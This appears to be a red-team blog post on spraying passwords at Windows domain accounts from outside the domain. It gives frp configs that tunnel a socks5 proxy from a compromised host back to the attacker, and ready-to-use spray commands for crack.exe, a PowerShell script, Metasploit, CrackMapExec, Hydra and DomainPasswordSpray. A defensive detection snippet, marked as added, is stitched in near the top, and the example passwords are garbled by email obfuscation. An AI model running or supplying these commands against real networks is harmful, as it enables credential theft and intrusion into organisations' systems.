Lateral movement in intranet penetration: password spraying from outside the domain
2022-06-24 01:29:00 【Gh0st1nTheShel】
**Welcome to my WeChat official account: 《The soul in the shell》**
A password spray is an automated attack. To avoid the account lockout that brute-forcing a single user's password would trigger, a password spray tries one password against every user; this sidesteps lockouts while also making password cracking more efficient. In other words, where a traditional brute force fixes the user name and iterates over passwords, a password spray fixes the password and iterates over user names.
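The one-password-many-users pattern just described is also what makes a spray stand out to a defender. As an added example (not part of the original post), the Python below classifies constructed failed-logon records by source into "spray" versus "bruteforce"; the record fields, the sample values and the thresholds are assumptions.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

TS_FORMAT = "%Y-%m-%d %H:%M:%S"

# Constructed sample of failed-logon records (timestamp, source IP, target user),
# the fields an analyst would extract from Windows Event ID 4625. Values are made up.
SAMPLE_EVENTS = [
    # one password sprayed across five accounts from one host
    ("2022-06-24 01:20:01", "10.10.10.50", "alice"),
    ("2022-06-24 01:20:02", "10.10.10.50", "bob"),
    ("2022-06-24 01:20:03", "10.10.10.50", "carol"),
    ("2022-06-24 01:20:04", "10.10.10.50", "dave"),
    ("2022-06-24 01:20:05", "10.10.10.50", "erin"),
    # classic brute force: one account hammered from another host
    ("2022-06-24 01:21:00", "10.10.10.77", "alice"),
    ("2022-06-24 01:21:01", "10.10.10.77", "alice"),
    ("2022-06-24 01:21:02", "10.10.10.77", "alice"),
    # benign: a user mistyping a password twice
    ("2022-06-24 01:30:00", "10.10.10.90", "grace"),
    ("2022-06-24 01:30:20", "10.10.10.90", "grace"),
]

def classify_sources(events, window=timedelta(minutes=5), min_users=5, max_per_user=2):
    """Label each source IP by the shape of its failures inside a sliding window.
    'spray'      : >= min_users distinct accounts, none tried more than max_per_user
                   times (the lockout-avoiding pattern described above)
    'bruteforce' : a single account tried more than max_per_user times
    Sources matching neither (ordinary typos) are omitted from the result."""
    by_src = defaultdict(list)
    for ts, src, user in events:
        by_src[src].append((datetime.strptime(ts, TS_FORMAT), user))
    verdicts = {}
    for src, rows in by_src.items():
        rows.sort()
        left, in_window = 0, Counter()
        for t, user in rows:
            in_window[user] += 1
            while t - rows[left][0] > window:      # drop events older than the window
                old_user = rows[left][1]
                in_window[old_user] -= 1
                if in_window[old_user] == 0:
                    del in_window[old_user]
                left += 1
            if max(in_window.values()) > max_per_user:
                verdicts[src] = "bruteforce"        # brute-force verdict overrides spray
            elif len(in_window) >= min_users and src not in verdicts:
                verdicts[src] = "spray"
    return verdicts
```

Tune `min_users` and `max_per_user` to sit below the domain's lockout threshold, since a spray is built to stay under that number per account.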
Establish communication tunnel
Generally, once our red team members have established a socks5 tunnel into the target network, they can collect information on the machines in the domain from outside (here meaning the red team member's own PC). Many tools then do not need to be uploaded to the target machine, which makes them less likely to be detected by AV, although some traffic-inspection devices may notice the large volume of socks5 traffic.
Use Proxifier and FRP to establish the socks5 tunnel
First, start the frps listener on the attacking machine (kali):
```ini
[common]
bind_port = 7000
```
Then run frpc on the target machine, connect it to kali, and open the socks5 service:
```ini
[common]
server_addr = 192.168.137.93   ; kali's IP
server_port = 7000

[plugin_socks]
type = tcp
remote_port = 7777
plugin = socks5
```
Finally, on the attacking win7 machine, connect to the socks5 proxy through Proxifier.
crack: password spraying from outside the domain (download link not found)
crack is a very handy and fast password spray tool; it supports spraying a whole C or B segment over smb. Command syntax:
```
# single user, single password
crack.exe -i 10.10.10.10/24 -p 445 -U redteam\saulgoodman -P [email protected]#45 -s smb -t 100
# user dictionary and password dictionary
crack.exe -i 10.10.10.10/24 -p 445 -U user.txt -P pass.txt -s smb -t 100
```
A successful spray writes a result.txt file to the current path containing the successful results.
Invoke-DomainPasswordSprayOutsideTheDomain (password spraying from outside the domain)
Invoke-DomainPasswordSprayOutsideTheDomain is a script written by 3gstudent.
Download address: https://github.com/3gstudent/Homework-of-Powershell
Using a single password:
```powershell
powershell -exec bypass
Import-Module .\Invoke-DomainPasswordSprayOutsideTheDomain.ps1
Invoke-DomainPasswordSprayOutsideTheDomain -UserList users.txt -Domain "10.10.10.10/DC=redteam,DC=com" -Password [email protected]#45
```
Using a password file:
```powershell
Invoke-DomainPasswordSprayOutsideTheDomain -UserList users.txt -Domain "10.10.10.10/DC=redteam,DC=com" -Password [email protected]#45
```
It is recommended to spray with a single password here; a password dictionary may cause an error.
Use msf for password spraying
First, configure the proxy:
```
setg proxies socks5:192.168.137.54:7777
setg ReverseAllowProxy true
```
Use the module:
```
scanner/smb/smb_login
```
You can configure file dictionaries for the brute force:
```
set user_file /root/users.txt
set pass_file /root/pass.txt
```
If you are brute-forcing a domain, set the domain:
```
set smbdomain redteam
```
If you are brute-forcing a workgroup:
```
set smbdomain .
```
However, it always shows that it cannot connect, and I don't know why.
Super Weak Password Check Tool: password spraying from outside the domain
The Super Weak Password Check Tool is a weak-password audit tool for the Windows platform. It supports batched, multithreaded checking and can quickly find accounts with weak passwords; a password can be combined with the account name for checking, which greatly raises the success rate, and custom server ports and dictionaries are supported. The tool is developed in C# and requires .NET Framework 4.0. It currently supports weak-password checks for SSH, RDP, SMB, MySQL, SQLServer, Oracle, FTP, MongoDB, Memcached, PostgreSQL, Telnet, SMTP, SMTP_SSL, POP3, POP3_SSL, IMAP, IMAP_SSL, SVN, VNC, Redis and others.
Download address: https://github.com/shack2/SNETCracker
CrackMapExec: password spraying from outside the domain
CrackMapExec (also known as CME) is a very handy password spray tool; it is installed by default in Kali Linux.
Download address: https://github.com/byt3bl33d3r/CrackMapExec
```
crackmapexec smb 10.10.10.12 -u users.txt -p '[email protected]#45' --continue-on-success
```
Hydra: password spraying from outside the domain
Hydra is one of the most famous brute-force tools. Here I target the SMB protocol, but this tool can use almost any other protocol to carry out password spraying.
```
hydra -L users.txt -p [email protected]#45 10.10.10.12 smb
```
Use DomainPasswordSpray
Tool address: https://github.com/dafthack/DomainPasswordSpray
DomainPasswordSpray is a tool written in PowerShell for password spraying attacks against domain users. By default it exports the user list from the domain via LDAP, removes the locked-out users, and then sprays the fixed password.
First import the script in powershell, then run it.
You can see the results.
Of course, we can also do it with a dictionary:
```powershell
Invoke-DomainPasswordSpray -UserList users.txt -Domain g1ts.com -PasswordList passlist.txt -OutFile sprayed-creds.txt
```
- UserList: User dictionary
- Password: Single password
- PasswordList: Password dictionary
- OutFile: Output file name
- Domain: The domain to be exploded
- Force: Continue spraying without prompting for confirmation.